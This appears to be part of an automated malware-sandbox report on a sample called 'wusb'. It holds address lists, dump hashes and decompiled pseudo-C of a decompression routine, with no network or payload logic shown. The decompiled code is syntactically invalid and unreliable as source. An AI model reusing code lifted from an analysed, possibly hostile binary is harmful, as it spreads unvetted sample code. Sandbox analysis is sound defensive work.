                                                        0x00406ece
                                                        0x00406ee7
                                                        0x00406ee9
                                                        0x00406eec
                                                        0x00406eed
                                                        0x00406ef0
                                                        0x00406ef2
                                                        0x00406ef5
                                                        0x00406ef7
                                                        0x00406ef9
                                                        0x00406efc
                                                        0x00406efe
                                                        0x00406f01
                                                        0x00406f05
                                                        0x00406f07
                                                        0x00406f07
                                                        0x00406f08
                                                        0x00406f0b
                                                        0x00406f0e
                                                        0x00406ed0
                                                        0x00406ed0
                                                        0x00406ed8
                                                        0x00406edd
                                                        0x00406edf
                                                        0x00406ee2
                                                        0x00406ee2
                                                        0x00406f11
                                                        0x00406f18
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00406f18
                                                        0x00406e2b
                                                        0x00406e2e
                                                        0x00406e30
                                                        0x00406e33
                                                        0x00406e36
                                                        0x00406e39
                                                        0x00406e3b
                                                        0x00406e3e
                                                        0x00406e41
                                                        0x00406e41
                                                        0x00406e44
                                                        0x00406e44
                                                        0x00406e47
                                                        0x00406e4e
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00000000
                                                        0x00406e50
                                                        0x00000000
                                                        0x00406e50
                                                        0x00406e4e
                                                        0x00406dd4
                                                        0x00406dd7
                                                        0x00406dd9
                                                        0x00406ddc
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b3b
                                                        0x00406b3b
                                                        0x00406b3f
                                                        0x00407184
                                                        0x00000000
                                                        0x00407184
                                                        0x00406b45
                                                        0x00406b48
                                                        0x00406b4b
                                                        0x00406b4e
                                                        0x00406b51
                                                        0x00406b54
                                                        0x00406b57
                                                        0x00406b59
                                                        0x00406b5c
                                                        0x00406b5f
                                                        0x00406b62
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cc6
                                                        0x00406cc6
                                                        0x00406cca
                                                        0x00407190
                                                        0x00000000
                                                        0x00407190
                                                        0x00406cd0
                                                        0x00406cd3
                                                        0x00406cd6
                                                        0x00406cd9
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cde
                                                        0x00406ce1
                                                        0x00406ce4
                                                        0x00406ce7
                                                        0x00406cea
                                                        0x00406ced
                                                        0x00406cee
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf3
                                                        0x00406cf6
                                                        0x00406cf9
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cff
                                                        0x00406d01
                                                        0x00406d01
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f47
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f4d
                                                        0x00406f50
                                                        0x00406f53
                                                        0x00406f56
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f5b
                                                        0x00406f5e
                                                        0x00406f61
                                                        0x00406f64
                                                        0x00406f67
                                                        0x00406f6a
                                                        0x00406f6b
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f70
                                                        0x00406f73
                                                        0x00406f76
                                                        0x00406f79
                                                        0x00406f7c
                                                        0x00406f80
                                                        0x00406f82
                                                        0x00406f85
                                                        0x00000000
                                                        0x00406f87
                                                        0x00406d04
                                                        0x00406d04
                                                        0x00000000
                                                        0x00406d04
                                                        0x00406f85
                                                        0x004071ba
                                                        0x004071dc
                                                        0x004071e2
                                                        0x004071e4
                                                        0x004071eb
                                                        0x004071ed
                                                        0x004071f4
                                                        0x004071f8
                                                        0x00000000
                                                        0x004067e9
                                                        0x004071f1
                                                        0x004071f1
                                                        0x00000000
                                                        0x004071f1
                                                        0x0040703e
                                                        0x004070c4
                                                        0x004070ca
                                                        0x004070cd
                                                        0x004070d0
                                                        0x004070d3
                                                        0x004070d6
                                                        0x004070d9
                                                        0x004070dc
                                                        0x004070df
                                                        0x004070e5
                                                        0x004070fe
                                                        0x00407101
                                                        0x00407104
                                                        0x00407107
                                                        0x0040710b
                                                        0x0040710d
                                                        0x0040710e
                                                        0x00407111
                                                        0x004070e7
                                                        0x004070e7
                                                        0x004070ef
                                                        0x004070f4
                                                        0x004070f6
                                                        0x004070f9
                                                        0x004070f9
                                                        0x0040711b
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x0040711d
                                                        0x0040711b
                                                        0x00000000
                                                        0x00406f90

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                                        • Instruction ID: 8e32eb5403c84004d501a5d2bb1c7049f427415ce0bc154380a8816354db292b
                                                        • Opcode Fuzzy Hash: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                                        • Instruction Fuzzy Hash: AE914271E04228CBDF28CF98C8547ADBBB1FF44305F14816AD856BB281C778AA86DF45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406CA2 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 98%
                                                        			E00406CA2() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004071F9))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4)); // executed
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
